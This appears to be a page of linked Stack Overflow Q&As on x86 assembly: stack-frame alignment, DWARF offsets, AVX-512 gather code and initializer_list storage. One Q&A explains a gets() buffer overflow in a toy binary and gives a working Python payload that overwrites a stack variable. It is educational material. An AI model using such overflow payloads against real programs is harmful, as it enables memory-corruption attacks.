I'm in the process of writing a compiler purely as a learning experience. I'm currently learning about stack frames by compiling simple c++ code and then studying the output asm produced by gcc 4.9.2 for Windows x86.
my simple c++ code is
#include <iostream>
using namespace std;
int globalVar;
void testStackStuff(void);
void testPassingOneInt32(int v);
void forceStackFrameCreation(int v);
int main()
{
globalVar = 0;
testStackStuff();
std::cout << globalVar << std::endl;
}
void testStackStuff(void)
{
testPassingOneInt32(666);
}
void testPassingOneInt32(int v)
{
globalVar = globalVar + v;
forceStackFrameCreation(v);
}
void forceStackFrameCreation(int v)
{
globalVar = globalVar + v;
}
Ok, when this is compiled with -mpreferred-stack-boundary=4 I was expecting to see a stack aligned to 16 bytes (technically it is aligned to 16 bytes but with an extra 16 bytes of unused stack space). The prologue for main as produced by gcc is:
22 .loc 1 12 0
23 .cfi_startproc
24 0000 8D4C2404 lea ecx, [esp+4]
25 .cfi_def_cfa 1, 0
26 0004 83E4F0 and esp, -16
27 0007 FF71FC push DWORD PTR [ecx-4]
28 000a 55 push ebp
29 .cfi_escape 0x10,0x5,0x2,0x75,0
30 000b 89E5 mov ebp, esp
31 000d 51 push ecx
32 .cfi_escape 0xf,0x3,0x75,0x7c,0x6
33 000e 83EC14 sub esp, 20
34 .loc 1 12 0
35 0011 E8000000 call ___main
35 00
36 .loc 1 13 0
37 0016 C7050000 mov DWORD PTR _globalVar, 0
38 .loc 1 15 0
39 0020 E8330000 call __Z14testStackStuffv
line 26 rounds esp down to the nearest 16 byte boundary.
lines 27, 28 and 31 push a total of 12 bytes onto the stack, then
line 33 subtracts another 20 bytes from esp, giving a total of 32 bytes!
Why?
line 39 then calls testStackStuff.
NOTE - this call pushes the return address (4 bytes).
Now, lets look at the prologue for testStackStuff, keeping in mind that the stack is now 4 bytes closer to the next 16 byte boundary.
67 0058 55 push ebp
68 .cfi_def_cfa_offset 8
69 .cfi_offset 5, -8
70 0059 89E5 mov ebp, esp
71 .cfi_def_cfa_register 5
72 005b 83EC18 sub esp, 24
73 .loc 1 22 0
74 005e C704249A mov DWORD PTR [esp], 666
line 67 pushes another 4 bytes (now 8 bytes towards the boundary).
line 72 subtracts another 24 bytes (total 32 bytes).
At this point the stack is now aligned correctly on a 16 byte boundary. But why the multiple of 2?
If I change the compiler flags to -mpreferred-stack-boundary=5 I would expect a stack aligned to 32 bytes, but again gcc seems to produce stack frames aligned to 64 bytes, twice the amount I was expecting.
Prologue for main
23 .cfi_startproc
24 0000 8D4C2404 lea ecx, [esp+4]
25 .cfi_def_cfa 1, 0
26 0004 83E4E0 and esp, -32
27 0007 FF71FC push DWORD PTR [ecx-4]
28 000a 55 push ebp
29 .cfi_escape 0x10,0x5,0x2,0x75,0
30 000b 89E5 mov ebp, esp
31 000d 51 push ecx
32 .cfi_escape 0xf,0x3,0x75,0x7c,0x6
33 000e 83EC34 sub esp, 52
34 .loc 1 12 0
35 0011 E8000000 call ___main
35 00
36 .loc 1 13 0
37 0016 C7050000 mov DWORD PTR _globalVar, 0
37 00000000
37 0000
38 .loc 1 15 0
39 0020 E8330000 call __Z14testStackStuffv
line 26 rounds esp down to the nearest 32 byte boundary
lines 27, 28 and 31 push a total of 12 bytes onto the stack, then
line 33 subtracts another 52 bytes from esp, giving a total of 64 bytes!
and the prologue for testStackStuff is
66 .cfi_startproc
67 0058 55 push ebp
68 .cfi_def_cfa_offset 8
69 .cfi_offset 5, -8
70 0059 89E5 mov ebp, esp
71 .cfi_def_cfa_register 5
72 005b 83EC38 sub esp, 56
73 .loc 1 22 0
(4 bytes on stack from) call __Z14testStackStuffv
(4 bytes on stack from) push ebp
(56 bytes on stack from) sub esp,56
total 64 bytes.
Does anybody know why gcc is creating this extra stack space or have I overlooked something obvious?
Thanks for any help you can offer.
In order to resolve this mystery, you will need to look at the documentation of gcc to find out exactly which flavor of Application Binary Interface (ABI) it uses, and then go find the specification of that ABI and read it. If you are "in the process of writing a compiler purely as a learning experience" you will definitely need it.
In short, and in broad terms, what is happening is that the ABI mandates that this extra space be reserved by the current function, for the purpose of passing parameters to functions invoked by the current function. The decision of how much space to reserve depends primarily on the amount of parameter passing that the function intends to do, but it is a bit more nuanced than that, and the ABI is the document which explains it in detail
In the old style of stack frames, we would PUSH parameters to the stack, and then invoke a function.
In the new style of stack frames, EBP is not used anymore, (not sure why it is preserved and copied from ESP anymore,) parameters are placed in the stack at a specific offset with respect to ESP, and then the function is invoked. This is evidenced by the fact that mov DWORD PTR [esp], 666 is used to pass the 666 argument to the call testPassingOneInt32(666);.
For why it's doing the push DWORD PTR [ecx-4] to copy the return address, see this partial duplicate. IIRC, it's constructing a complete copy of the return-address / saved-ebp pair.
but again gcc seems to produce stack frames aligned to 64 bytes
No, it used and esp, -32. The stack frame size looks like 64 bytes, but its alignment is only 32B.
I'm not sure why it leaves so much extra space in the stack frame. It's not very interesting to guess why gcc -O0 does what it does, because it's not even trying to be optimal.
You obviously compiled without optimization, which makes the whole thing less interesting. This tells you more about gcc internals and what was convenient for gcc, not that the code it emitted was necessary or does anything useful. Also, use http://gcc.godbolt.org/ to get nice asm output without the CFI directives and other noise. (Please tidy up the asm code blocks in your question with output from that. All the noise makes them harder to read.)
Related
This is an extract of a binary that is buffer overflowed. I decompiled it with Ghidra.
char local_7 [32];
long local_78;
printf("Give it a try");
gets(local_7);
if (local_78 != 0x4141414141414141) {
if (local_78 == 0x1122334455667788) {
puts ("That's won")
}
puts("Let's continue");
}
I'd like to understand why it is possible to make a buffer overflow.
I checked the "0x4141414141414141" hex value and saw it was related to "A" string. But what the conditions related to "0x4141414141414141" and "0x1122334455667788" exactly do ? And to be more precise, what the user could answer to get the message ("That's won") ?
Any explanations would be greatly appreciated, thanks !
___EDIT___
I have to add that I see these two hex values at using "disas main" command :
0x00000000000011a7 <+8>: movabs $0x4141414141414141,%rax
0x00000000000011e6 <+71>: movabs $0x4141414141414141,%rax
0x00000000000011f6 <+87>: movabs $0x1122334455667788,%rax
I tried a buffer overflow using python3 -c "print ('A' * 32 +'\x88\x77\x66\x55\x44\x33\x22\x11')" | ./ myBinary.
But I always have the "Let's continue" message. I'm not that far from the solution but I guess I miss a thing.. Could you help me what ?
___EDIT 2___
Before the gets :
char local_7 [40];
long local_78;
local_78 = 0x4141414141414141;
printf("Give it a try");
fflush(stdout);
gets(local_7);
[... and so on]
Here is the full disassembly:
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000001189 <+0>: endbr64
0x000000000000118d <+4>: push %rbp
0x000000000000118e <+5>: mov %rsp,%rbp
0x0000000000001191 <+8>: sub $0x30,%rsp
0x0000000000001195 <+12>: lea 0xe68(%rip),%rdi # 0x2004
0x000000000000119c <+19>: mov $0x0,%eax
0x00000000000011a1 <+24>: callq 0x1080 <printf#plt>
0x00000000000011a6 <+29>: lea -0x30(%rbp),%rax
0x00000000000011aa <+33>: mov %rax,%rdi
0x00000000000011ad <+36>: mov $0x0,%eax
0x00000000000011b2 <+41>: callq 0x1090 <gets#plt>
0x00000000000011b7 <+46>: movabs $0x4141414141414141,%rax
0x00000000000011c1 <+56>: cmp %rax,-0x8(%rbp)
0x00000000000011c5 <+60>: je 0x11ef <main+102>
0x00000000000011c7 <+62>: movabs $0x1122334455667788,%rax
0x00000000000011d1 <+72>: cmp %rax,-0x8(%rbp)
0x00000000000011d5 <+76>: jne 0x11e3 <main+90>
0x00000000000011d7 <+78>: lea 0xe34(%rip),%rdi # 0x2012
0x00000000000011de <+85>: callq 0x1070 <puts#plt>
0x00000000000011e3 <+90>: lea 0xe33(%rip),%rdi # 0x201d
0x00000000000011ea <+97>: callq 0x1070 <puts#plt>
0x00000000000011ef <+102>: mov $0x0,%eax
0x00000000000011f4 <+107>: leaveq
0x00000000000011f5 <+108>: retq
The important addresses can be determined from the instruction setting the gets parameter as local_7:
0x00000000000011a6 <+29>: lea -0x30(%rbp),%rax
and the cmp instruction comparing the local_78 variable.
0x00000000000011c1 <+56>: cmp %rax,-0x8(%rbp)
As you can see the local_7 is at -0x30(%rbp), and local_78 is at -0x8(%rbp), exactly 40 bytes after the buffer.
Your python command is not correct since you are using string operations which cause it to produce valid UTF-8, and therefore, extra bytes:
$ python3 -c "print ('A' * 40 +'\x88\x77\x66\x55\x44\x33\x22\x11')"|hd -v
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000020 41 41 41 41 41 41 41 41 c2 88 77 66 55 44 33 22 |AAAAAAAA..wfUD3"|
00000030 11 0a |..|
00000032
Notice the c2 byte before 88. See the following question for details:
Why is the output of print in python2 and python3 different with the same string?
If we instead use bytes types, we can get the correct output:
$ python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')"|hd -v
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000020 41 41 41 41 41 41 41 41 88 77 66 55 44 33 22 11 |AAAAAAAA.wfUD3".|
00000030
Using this input, we get the "That's won" message:
$ python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')"|./a.out
Give it a tryThat's won
Let's continue
This binary is vulnerable to a buffer overflow because it uses the gets() function, which is vulnerable, and deprecated because of that reason.
It will copy the user input to the passed buffer, without checking the size of the buffer. So, if the input of the user is larger than the available space, it will overflow in memory and potentially, overwrite other variables or structures that are located after the buffer.
That is the case of the long local_78; variable, which is in the stack after the buffer, so we can potentially overwrite its value.
To do so, we need to pass an input that is:
minimun 32 bytes, to fill the actual buffer. (A char (ASCII character) should usually equivalent to 1 byte)
plus, an additional variable number of bytes to fill the space between the buffer and the long variable (this is because a lot of times, compilers make optimization and may add other variables between those two, even if we haven't placed them just there in the code. The stack is a dynamic memory region so it's not often possible to 100% predict its layout)
plus, 8 bytes, which is typically the size of a long in most computer architectures (though it could be different, but let's assume this is x86/64). This is the value we will be overflowing the variable with.
We don't care about the stuff we put in the first 32+X bytes (except for the null byte). The program then checks for some special value of local_78, and if that check passes, it will execute puts ("That's won"); saying that you have "won" or successfully exploited the program and overwrote the memory.
The problem here, is that such value is 0x1122334455667788 (again, a long which is 8 bytes). We could read this separating its bytes: 0x11 0x22 0x33 0x44 0x55 0x66 0x77 0x88, and trying to see which byte corresponds to which character in ASCII
The issue is that bytes like 0x22 are not ASCII representable characters, so you cannot type them directly into the console, because normal keyboards don't have a key that inputs the character 0x11 as it doesn't have a visual representation. You will need an additional program to exploit the program. Such program will need to use any mechanisms available in the Operating System to pass such values. In Linux for example this can be done using pipes / output redirection
I am playing around with CPython and trying to understand how a debugger works.
Specifically, I am trying to get the location of the last PyFrameObject so that I can traverse that and get the Python backtrace.
In the file ceval.c, line 689 has the definition of the function:
PyObject * PyEval_EvalFrameEx(PyFrameObject *f, int throwflag)
What I am interested in getting is the location of f on the stack. When dumping the binary with dwarfdump I get that f is at $rbp-824, but if I dump the binary with objdump I get that the location is $rbp-808 - a discrepancy of 16. Also, when debugging with GDB, I get that the correct answer is $rbp-808 like objdump gives me. Why the discrepancy, and why is dwarfdump incorrect? What am I not understanding?
How to technically recreate the problem:
Download python-2.7.17.tgz from Python website. Extract.
I compiled python-2.7.17 from source with debug symbols (./configure --enable-pydebug && make). Run the following commands on the resulting python binary:
dwarfdump Python-2.7.17/python has the following output:
DW_AT_name f
DW_AT_decl_file 0x00000001 /home/meir/code/python/Python-2.7.17/Python/ceval.c
DW_AT_decl_line 0x000002b1
DW_AT_type <0x00002916>
DW_AT_location len 0x0003: 91c879: DW_OP_fbreg -824
I know this is the correct f because the line the variable is declared on is 689 (0x2b1). As you can see the location is:
DW_AT_location len 0x0003: 91c879: DW_OP_fbreg -824: Meaning $rbp-824.
Running the command objdump -S Python-2.7.17/python has the following output:
PyEval_EvalFrameEx(PyFrameObject *f, int throwflag)
{
f7577: 55 push %rbp
f7578: 48 89 e5 mov %rsp,%rbp
f757b: 41 57 push %r15
f757d: 41 56 push %r14
f757f: 41 55 push %r13
f7581: 41 54 push %r12
f7583: 53 push %rbx
f7584: 48 81 ec 38 03 00 00 sub $0x338,%rsp
f758b: 48 89 bd d8 fc ff ff mov %rdi,-0x328(%rbp)
f7592: 89 b5 d4 fc ff ff mov %esi,-0x32c(%rbp)
f7598: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
f759f: 00 00
f75a1: 48 89 45 c8 mov %rax,-0x38(%rbp)
f75a5: 31 c0 xor %eax,%eax
Debugging this output will show you that the relevant line is:
f758b: 48 89 bd d8 fc ff ff mov %rdi,-0x328(%rbp) where you can clearly see that f is being loaded from -0x328(%rbp) which is $rbp-808. Also, GDB supports this finding.
So again, the question is, what am I missing and why the 16 byte discrepency between dwarfdump and reality?
Thanks
Edit:
The dwarfdump including the function above is:
< 1><0x00004519> DW_TAG_subprogram
DW_AT_external yes(1)
DW_AT_name PyEval_EvalFrameEx
DW_AT_decl_file 0x00000001 /home/meir/code/python/Python-2.7.17/Python/ceval.c
DW_AT_decl_line 0x000002b1
DW_AT_prototyped yes(1)
DW_AT_type <0x00000817>
DW_AT_low_pc 0x000f7577
DW_AT_high_pc <offset-from-lowpc>53969
DW_AT_frame_base len 0x0001: 9c: DW_OP_call_frame_cfa
DW_AT_GNU_all_tail_call_sites yes(1)
DW_AT_sibling <0x00005bbe>
< 2><0x0000453b> DW_TAG_formal_parameter
DW_AT_name f
DW_AT_decl_file 0x00000001 /home/meir/code/python/Python-2.7.17/Python/ceval.c
DW_AT_decl_line 0x000002b1
DW_AT_type <0x00002916>
DW_AT_location len 0x0003: 91c879: DW_OP_fbreg -824
According to the answer below, DW_OP_fbreg is offset from the frame base - in my case DW_OP_call_frame_cfa. I am having trouble identifying the frame base. My registers are as following:
(gdb) info registers
rax 0xfffffffffffffdfe -514
rbx 0x7f6a4887d040 140094460121152
rcx 0x7f6a48e83ff7 140094466441207
rdx 0x0 0
rsi 0x0 0
rdi 0x0 0
rbp 0x7ffd24bcef00 0x7ffd24bcef00
rsp 0x7ffd24bceba0 0x7ffd24bceba0
r8 0x7ffd24bcea50 140725219813968
r9 0x0 0
r10 0x0 0
r11 0x246 582
r12 0x7f6a48870df0 140094460071408
r13 0x7f6a48874b58 140094460087128
r14 0x1 1
r15 0x7f6a48873794 140094460082068
rip 0x5559834e99c0 0x5559834e99c0 <PyEval_EvalFrameEx+46153>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
As stated above, I already know that %rbp-808 works. What is the correct way to do it with the registers that I have?
Edit:
I finally understood the answer. I needed to unwind one more function, and find the place my function was called. There, the variable I was looking for really was in $rsp and $rsp-824 was correct
DW_OP_fbreg -824: Meaning $rbp-824
It does not mean that. It means, offset -824 from frame base (virtual) register, which is not necessarily (nor usually) equal to $rbp.
You need to look for DW_AT_frame_base to know what the frame base in the current function is.
Most likely it's defined as DW_OP_call_frame_cfa, which is the value of $RSP just before current function was called, and is equal to $RBP-16 (8 bytes for return address saved by the CALL instruction, and 8 bytes for previous $RBP saved by the first instruction of your function).
I've recently been introduced to Vector Instructions (theoretically) and am excited about how I can use them to speed up my applications.
One area I'd like to improve is a very hot loop:
__declspec(noinline) void pleaseVectorize(int* arr, int* someGlobalArray, int* output)
{
for (int i = 0; i < 16; ++i)
{
auto someIndex = arr[i];
output[i] = someGlobalArray[someIndex];
}
for (int i = 0; i < 16; ++i)
{
if (output[i] == 1)
{
return i;
}
}
return -1;
}
But of course, all 3 major compilers (msvc, gcc, clang) refuse to vectorize this. I can sort of understand why, but I wanted to get a confirmation.
If I had to vectorize this by hand, it would be:
(1) VectorLoad "arr", this brings in 16 4-byte integers let's say into zmm0
(2) 16 memory loads from the address pointed to by zmm0[0..3] into zmm1[0..3], load from address pointed into by zmm0[4..7] into zmm1[4..7] so on and so forth
(3) compare zmm0 and zmm1
(4) vector popcnt into the output to find out the most significant bit and basically divide that by 8 to get the index that matched
First of all, can vector instructions do these things? Like can they do this "gathering" operation, i.e. do a load from address pointing to zmm0?
Here is what clang generates:
0000000000400530 <_Z5superPiS_S_>:
400530: 48 63 07 movslq (%rdi),%rax
400533: 8b 04 86 mov (%rsi,%rax,4),%eax
400536: 89 02 mov %eax,(%rdx)
400538: 48 63 47 04 movslq 0x4(%rdi),%rax
40053c: 8b 04 86 mov (%rsi,%rax,4),%eax
40053f: 89 42 04 mov %eax,0x4(%rdx)
400542: 48 63 47 08 movslq 0x8(%rdi),%rax
400546: 8b 04 86 mov (%rsi,%rax,4),%eax
400549: 89 42 08 mov %eax,0x8(%rdx)
40054c: 48 63 47 0c movslq 0xc(%rdi),%rax
400550: 8b 04 86 mov (%rsi,%rax,4),%eax
400553: 89 42 0c mov %eax,0xc(%rdx)
400556: 48 63 47 10 movslq 0x10(%rdi),%rax
40055a: 8b 04 86 mov (%rsi,%rax,4),%eax
40055d: 89 42 10 mov %eax,0x10(%rdx)
400560: 48 63 47 14 movslq 0x14(%rdi),%rax
400564: 8b 04 86 mov (%rsi,%rax,4),%eax
400567: 89 42 14 mov %eax,0x14(%rdx)
40056a: 48 63 47 18 movslq 0x18(%rdi),%rax
40056e: 8b 04 86 mov (%rsi,%rax,4),%eax
400571: 89 42 18 mov %eax,0x18(%rdx)
400574: 48 63 47 1c movslq 0x1c(%rdi),%rax
400578: 8b 04 86 mov (%rsi,%rax,4),%eax
40057b: 89 42 1c mov %eax,0x1c(%rdx)
40057e: 48 63 47 20 movslq 0x20(%rdi),%rax
400582: 8b 04 86 mov (%rsi,%rax,4),%eax
400585: 89 42 20 mov %eax,0x20(%rdx)
400588: 48 63 47 24 movslq 0x24(%rdi),%rax
40058c: 8b 04 86 mov (%rsi,%rax,4),%eax
40058f: 89 42 24 mov %eax,0x24(%rdx)
400592: 48 63 47 28 movslq 0x28(%rdi),%rax
400596: 8b 04 86 mov (%rsi,%rax,4),%eax
400599: 89 42 28 mov %eax,0x28(%rdx)
40059c: 48 63 47 2c movslq 0x2c(%rdi),%rax
4005a0: 8b 04 86 mov (%rsi,%rax,4),%eax
4005a3: 89 42 2c mov %eax,0x2c(%rdx)
4005a6: 48 63 47 30 movslq 0x30(%rdi),%rax
4005aa: 8b 04 86 mov (%rsi,%rax,4),%eax
4005ad: 89 42 30 mov %eax,0x30(%rdx)
4005b0: 48 63 47 34 movslq 0x34(%rdi),%rax
4005b4: 8b 04 86 mov (%rsi,%rax,4),%eax
4005b7: 89 42 34 mov %eax,0x34(%rdx)
4005ba: 48 63 47 38 movslq 0x38(%rdi),%rax
4005be: 8b 04 86 mov (%rsi,%rax,4),%eax
4005c1: 89 42 38 mov %eax,0x38(%rdx)
4005c4: 48 63 47 3c movslq 0x3c(%rdi),%rax
4005c8: 8b 04 86 mov (%rsi,%rax,4),%eax
4005cb: 89 42 3c mov %eax,0x3c(%rdx)
4005ce: c3 retq
4005cf: 90 nop
Your idea of how it could work is close, except that you want a bit-scan / find-first-set-bit (x86 BSF or TZCNT) of the compare bitmap, not population-count (number of bits set).
AVX2 / AVX512 have vpgatherdd which does use a vector of signed 32-bit scaled indices. It's barely worth using on Haswell, improved on Broadwell, and very good on Skylake. (http://agner.org/optimize/, and see other links in the x86 tag wiki, such as Intel's optimization manual which has a section on gather performance). The SIMD compare and bitscan are very cheap by comparison; single uop and fully pipelined.
gcc8.1 can auto-vectorize your gather, if it can prove that your inputs don't overlap your output function arg. Sometimes possible after inlining, but for the non-inline version, you can promise this with int * __restrict output. Or if you make output a local temporary instead of a function arg. (General rule: storing through a non-_restrict pointer will often inhibit auto-vectorization, especially if it's a char* that can alias anything.)
gcc and clang never vectorize search loops; only loops where the trip-count can be calculated before entering the loop. But ICC can; it does a scalar gather and stores the result (even if output[] is a local so it doesn't have to do that as a side-effect of running the function), then uses SIMD packed-compare + bit-scan.
Compiler output for a __restrict version. Notice that gcc8.1 and ICC avoid 512-bit vectors by default when tuning for Skylake-AVX512. 512-bit vectors can limit the max-turbo, and always shut down the vector ALU on port 1 while they're in the pipeline, so it can make sense to use AVX512 or AVX2 with 256-bit vectors in case this function is only a small part of a big program. (Compilers don't know that this function is super-hot in your program.)
If output[] is a local, a better code-gen strategy would probably be to compare while gathering, so an early hit skips the rest of the loads. The compilers that go fully scalar (clang and MSVC) both miss this optimization. In fact, they even store to the local array even though clang mostly doesn't re-read it (keeping results in registers). Writing the source with the compare inside the first loop would work to get better scalar code. (Depending on cache misses from the gather vs. branch mispredicts from non-SIMD searching, scalar could be a good strategy. Especially if hits in the first few elements are common. Current gather hardware can't take advantage of multiple elements coming from the same cache line, so the hard limit is still 2 elements loaded per clock cycle.
But using a wide vector load for the indices to feed a gather reduces load-port / cache access pressure significantly if your data was mostly hot in cache.)
A compiler could have auto-vectorized the __restrict version of your code to something like this. (gcc manages the gather part, ICC manages the SIMD compare part)
;; Windows x64 calling convention: rcx,rdx, r8,r9
; but of course you'd actually inline this
; only uses ZMM16..31, so vzeroupper not required
vmovdqu32 zmm16, [rcx/arr] ; You def. want to reach an alignment boundary if you can for ZMM loads, vmovdqa32 will enforce that
kxnorw k1, k0,k0 ; k1 = -1. k0 false dep is likely not a problem.
; optional: vpxord xmm17, xmm17, xmm17 ; break merge-masking false dep
vpgatherdd zmm17{k1}, [rdx + zmm16 * 4] ; GlobalArray + scaled-vector-index
; sets k1 = 0 when done
vmovdqu32 [r8/output], zmm17
vpcmpd k1, zmm17, zmm31, 0 ; 0->EQ. Outside the loop, do zmm31=set1_epi32(1)
; k1 = compare bitmap
kortestw k1, k1
jz .not_found ; early check for not-found
kmovw edx, k1
; tzcnt doesn't have a false dep on the output on Skylake
; so no AVX512 CPUs need to worry about that HSW/BDW issue
tzcnt eax, edx ; bit-scan for the first (lowest-address) set element
; input=0 produces output=32
; or avoid the branch and let 32 be the not-found return value.
; or do a branchless kortestw / cmov if -1 is directly useful without branching
ret
.not_found:
mov eax, -1
ret
You can do this yourself with intrinsics:
Intel's instruction-set reference manual (HTML extract at http://felixcloutier.com/x86/index.html) includes C/C++ intrinsic names for each instruction, or search for them in https://software.intel.com/sites/landingpage/IntrinsicsGuide/
I changed the output type to __m512i. You could change it back to an array if you aren't manually vectorizing the caller. You definitely want this function to inline.
#include <immintrin.h>
//__declspec(noinline) // I *hope* this was just to see the stand-alone asm version
// but it means the output array can't optimize away at all
//static inline
int find_first_1(const int *__restrict arr, const int *__restrict someGlobalArray, __m512i *__restrict output)
{
__m512i vindex = _mm512_load_si512(arr);
__m512i gather = _mm512_i32gather_epi32(vindex, someGlobalArray, 4); // indexing by 4-byte int
*output = gather;
__mmask16 cmp = _mm512_cmpeq_epi32_mask(gather, _mm512_set1_epi32(1));
// Intrinsics make masks freely convert to integer
// even though it costs a `kmov` instruction either way.
int onepos = _tzcnt_u32(cmp);
if (onepos >= 16){
return -1;
}
return onepos;
}
All 4 x86 compilers produce similar asm to what I suggested (see it on the Godbolt compiler explorer), but of course they have to actually materialize the set1_epi32(1) vector constant, or use a (broadcast) memory operand. Clang actually uses a {1to16} broadcast-load from a constant for the compare: vpcmpeqd k0, zmm1, dword ptr [rip + .LCPI0_0]{1to16}. (Of course they will make different choices whe inlined into a loop.) Others use mov eax,1 / vpbroadcastd zmm0, eax.
gcc8.1 -O3 -march=skylake-avx512 has two redundant mov eax, -1 instructions: one to feed a kmov for the gather, the other for the return-value stuff. Silly compiler should keep it around and use a different register for the 1.
All of them use zmm0..15 and thus can't avoid a vzeroupper. (xmm16.31 are not accessible with legacy-SSE, so the SSE/AVX transition penalty problem that vzeroupper solves doesn't exist if the only wide vector registers you use are y/zmm16..31). There may still be tiny possible advantages to vzeroupper, like cheaper context switches when the upper halves of ymm or zmm regs are known to be zero (Is it useful to use VZEROUPPER if your program+libraries contain no SSE instructions?). If you're going to use it anyway, no reason to avoid xmm0..15.
Oh, and in the Windows calling convention, xmm6..15 are call-preserved. (Not ymm/zmm, just the low 128 bits), so zmm16..31 are a good choice if you run out of xmm0..5 regs.
I'm currently reading a very informative and good-to-follow book about C-Security and currently there is a chapter about Assembly.
Considering the following C-Code:
1 void funktion (int a, int b, int c)
2 {
3 int buff1[5];
4 char buff2[10];
5 buff1[0] = '6';
6 buff2[0] = 'A';
7 buff2[1] = 'B';
8 }
9
10 int main (void)
11 {
12 int i = 1;
13 funktion (1, 2, 3);
14 return 0;
15 }
When I debug the executable in gdb and disassemble main, I get the following output:
# -----------FUNC_PROLOG----------
24 0x00000000004004d4 <+0>: push %rbp
28 0x00000000004004d5 <+1>: mov %rsp,%rbp
33 0x00000000004004d8 <+4>: sub $0x10,%rsp
34
#----------FUNC_OPERATIONS----------
39 0x00000000004004dc <+8>: movl $0x1,-0x4(%rbp)
43 0x00000000004004e3 <+15>: mov $0x3,%edx
44 0x00000000004004e8 <+20>: mov $0x2,%esi
45 0x00000000004004ed <+25>: mov $0x1,%edi
The book I'm reading is from 2003, so I know that my compilation doesn't look exactly the same as like in the book, so I interpret this instruction (line 33) as the enlargement of the current stack-frame. In the book, there's a decrementation (= enlargement of the stack-frame) by 4 bytes, and I have a dec by 16 bytes: I think this is an optimation they made, so that the size of local var's (int i = 4 bytes) + the size of the parameters (int a, int b, int c = 12 bytes) = 16 bytes are allocated directly at the stack, and not pushing the stack each time, which is less efficient. However this could be a misinterpretation of mine which is relevant for the real question I have:
From line 43-45 the parameters are stored in reversed order, but they are stored in registers, not at the stack, how you can see there.
So why is there memory allocated for the parameters at the stack, although they are not stored at the stack?
Btw-Questions:
At line 28 you can see a mov instruction. Why? I thought AT&T needs a size-suffix.
Is it possible to adjust gdb so, that I see direct values in decimal, not in hexadecimal base?
In the C++11 standard there is a note regarding the array backing the uniform initialisation that states:
The implementation is free to allocate the array in read-only memory if an explicit array with the same initializer could be so allocated.
Does GCC/Clang/VS take advantage of this? Or is every initialisation using this feature subject to additional data on the stack, and additional initialisation time for this hidden array?
For instance, given the following example:
void function()
{
std::vector<std::string> values = { "First", "Second" };
...
Would each of the compilers mentioned above store the backing array to the uniform initialisation in the same memory as a variable declared static const? And would each of the compilers initialise the backing array when the function is called, or on application initialisation? (I'm not talking about the std::initializer_list<std::string> that would be created, but rather the "hidden array" it refers to.
This is my attempt to answer my own question for at least GCC. My understanding of the assembler output of gcc is not fantastic, so please correct as necessary.
Using initializer_test.cpp:
#include <vector>
int main()
{
std::vector<long> values = { 123456, 123457, 123458 };
return 0;
}
And compiling using gcc v4.6.3 using the following command line:
g++ -Wa,-adhln -g initializer_test.cpp -masm=intel -std=c++0x -fverbose-asm | c++filt | view -
I get the following output (cut down to the hopefully relevant bits):
5:initializer_test.cpp **** std::vector<long> values = { 123456, 123457, 123458 };
100 .loc 2 5 0
101 0009 488D45EF lea rax, [rbp-17] # tmp62,
102 000d 4889C7 mov rdi, rax #, tmp62
103 .cfi_offset 3, -24
104 0010 E8000000 call std::allocator<long>::allocator() #
104 00
105 0015 488D45D0 lea rax, [rbp-48] # tmp63,
106 0019 BA030000 mov edx, 3 #, <-- Parameter 3
106 00
107 001e BE000000 mov esi, OFFSET FLAT:._42 #, <-- Parameter 2
107 00
108 0023 4889C7 mov rdi, rax #, tmp63 <-- Parameter 1
109 0026 E8000000 call std::initializer_list<long>::initializer_list(long const*, unsigned long) #
109 00
110 002b 488D4DEF lea rcx, [rbp-17] # tmp64,
111 002f 488B75D0 mov rsi, QWORD PTR [rbp-48] # tmp65, D.10602
112 0033 488B55D8 mov rdx, QWORD PTR [rbp-40] # tmp66, D.10602
113 0037 488D45B0 lea rax, [rbp-80] # tmp67,
114 003b 4889C7 mov rdi, rax #, tmp67
115 .LEHB0:
116 003e E8000000 call std::vector<long, std::allocator<long> >::vector(std::initializer_list<long>, std::allocator<long> const&) #
116 00
117 .LEHE0:
118 .loc 2 5 0 is_stmt 0 discriminator 1
119 0043 488D45EF lea rax, [rbp-17] # tmp68,
120 0047 4889C7 mov rdi, rax #, tmp68
121 004a E8000000 call std::allocator<long>::~allocator() #
and
1678 .section .rodata
1679 0002 00000000 .align 16
1679 00000000
1679 00000000
1679 0000
1682 ._42:
1683 0010 40E20100 .quad 123456
1683 00000000
1684 0018 41E20100 .quad 123457
1684 00000000
1685 0020 42E20100 .quad 123458
1685 00000000
Now if I'm understanding the call on line 109 correctly in the context of x86-64 System V AMD64 ABI calling convention (the parameters I've annotated to the code listing), this is showing that the backing array is being stored in .rodata, which I am taking to be the same memory as static const data. At least for gcc 4.6 anyway.
Performing a similar thing test but with optimisations turned on (-O2) it seems the initializer_list is optimised out:
70 .file 2 "/usr/include/c++/4.6/ext/new_allocator.h"
71 .loc 2 92 0
72 0004 BF180000 mov edi, 24 #,
72 00
73 0009 E8000000 call operator new(unsigned long) #
73 00
74 .LVL1:
75 .file 3 "/usr/include/c++/4.6/bits/stl_algobase.h"
76 .loc 3 366 0
77 000e 488B1500 mov rdx, QWORD PTR ._42[rip] # ._42, ._42
77 000000
90 .file 4 "/usr/include/c++/4.6/bits/stl_vector.h"
91 .loc 4 155 0
92 0015 4885C0 test rax, rax # D.11805
105 .loc 3 366 0
106 0018 488910 mov QWORD PTR [rax], rdx #* D.11805, ._42
107 001b 488B1500 mov rdx, QWORD PTR ._42[rip+8] # ._42, ._42
107 000000
108 0022 48895008 mov QWORD PTR [rax+8], rdx #, ._42
109 0026 488B1500 mov rdx, QWORD PTR ._42[rip+16] # ._42, ._42
109 000000
110 002d 48895010 mov QWORD PTR [rax+16], rdx #, ._42
124 .loc 4 155 0
125 0031 7408 je .L8 #,
126 .LVL3:
127 .LBB342:
128 .LBB343:
